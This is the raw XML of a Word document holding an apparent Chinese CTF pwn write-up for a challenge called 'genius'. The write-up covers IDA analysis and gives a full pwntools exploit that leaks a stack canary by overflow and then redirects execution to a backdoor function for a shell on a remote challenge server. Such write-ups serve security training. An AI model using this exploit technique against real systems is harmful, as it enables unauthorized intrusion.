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6F35478B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706F27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@qq</w:t>
      </w:r>
      <w:r w:rsidR="00706F27">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFA74" w14:textId="76C3D891" w:rsidR="00AF064E" w:rsidRDefault="009337F9" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>PWN</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00B70442" w:rsidRPr="00B70442">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B70442" w:rsidRPr="00B70442">
        <w:t>genius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5D41BCBF" w14:textId="779A1AA5" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>丢入ida中分析一下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入是否为no，为no则进入function1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A06A97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="306DD78D" wp14:editId="00F31B50">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>786130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4572638" cy="2295845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88211" w14:textId="59327248" w:rsidR="00A06A97" w:rsidRPr="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A06A97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入6字节字符然后调用function2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267688E1" w14:textId="18D5511C" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A06A97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47D7DCEE" wp14:editId="60A9D848">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>733425</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>335915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3229426" cy="1619476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96A96" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入是否为thanks，时thanks就会进入function3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8B6C5" w14:textId="5CFE89C0" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A06A9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BF77FB7" wp14:editId="50EB57B6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3543795" cy="1657581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D17D8" w14:textId="6B6D73AF" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>俩次栈溢出,通过检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79878D88" w14:textId="3C561E99" w:rsidR="00AF064E" w:rsidRPr="006D7CD7" w:rsidRDefault="00A06A97" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A06A97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12365C56" wp14:editId="4EE09BA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39058" cy="2210108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64E" w:rsidRPr="006D7CD7">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00AF064E" w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D69C4B7" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAC9B23" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from LibcSearcher import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C874E4" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97"/>
    <w:p w14:paraId="42392D3D" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context.arch='amd64'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268951E8" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>filename='./pwn'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D17F576" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#libc = './libc.so'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B30BB50" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97"/>
    <w:p w14:paraId="378EA0E3" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p = remote('101.200.155.151',12200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF0079" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#p=process(filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B822442" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e=ELF(filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB5CD06" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context.log_level = 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8718DF" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#libc=ELF(libc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D21DF9" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97"/>
    <w:p w14:paraId="7FD48FC7" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>r = lambda x: p.recv(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189CB996" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ra = lambda: p.recvall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F885F5F" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rl = lambda: p.recvline(keepends=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF9BF9" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ru = lambda x: p.recvuntil(x, drop=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF7ED6" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s = lambda x: p.send(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0541E0B7" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sl = lambda x: p.sendline(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B568174" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sa = lambda x, y: p.sendafter(x, y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B12917" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sla = lambda x, y: p.sendlineafter(x, y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37822B0D" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ia = lambda: p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA6772" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c = lambda: p.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651F2C18" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>li = lambda x: log.info(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EB90F2" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>db = lambda: gdb.attach()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23249A43" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l64 = lambda: u64(p.recvuntil('\x7f')[-6:].ljust(8,b"\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3ECA0A" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l32 = lambda: u32(p.recvuntil('\xf7')[-4:].ljust(4,b"\x00"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D9C955" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130DAAB5" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ru(b'you are a genius,yes or no?')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A99A7" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload = b'no'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C5627A" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sl(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635FAEBF" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ru(b"Sir, don't be so modest.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BFB9B7" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload = b'thanks'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4483A4" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sl(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457ADC1B" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97"/>
    <w:p w14:paraId="155AD420" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>backdoor = 0x4011A6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58887AB5" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97"/>
    <w:p w14:paraId="06D85C9B" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload = b'a'*0x16 + b'bbb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35655A89" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F0467" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ru(b'bbb')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E689399" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>canary = u64(p.recv(7).rjust(8,b'\x00'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF3268E" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(f'======canary =&gt; {hex(canary)}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371AE47C" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload = b'a'*0x18 + p64(canary) + p64(0x404c00) +p64(0x40101a) + p64(backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBC4D27" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sl(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE89E6B" w14:textId="77777777" w:rsidR="00A06A97" w:rsidRDefault="00A06A97" w:rsidP="00A06A97">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="5B03D02C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79FCA" w14:textId="77777777" w:rsidR="00EA7BDF" w:rsidRDefault="00EA7BDF" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4AFE9164" w14:textId="77777777" w:rsidR="00EA7BDF" w:rsidRDefault="00EA7BDF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73EAA" w14:textId="77777777" w:rsidR="00EA7BDF" w:rsidRDefault="00EA7BDF" w:rsidP="005B605D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0FE65949" w14:textId="77777777" w:rsidR="00EA7BDF" w:rsidRDefault="00EA7BDF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D7CD7"/>
    <w:rsid w:val="00706F27"/>
    <w:rsid w:val="0084766E"/>
    <w:rsid w:val="008B58F1"/>
    <w:rsid w:val="008C7F1B"/>
    <w:rsid w:val="009337F9"/>
    <w:rsid w:val="00A06A97"/>
    <w:rsid w:val="00A14648"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00B25A25"/>
    <w:rsid w:val="00B70442"/>
    <w:rsid w:val="00BB5292"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CD7DCC"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="00EA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A06A97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2025-05-16T19:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>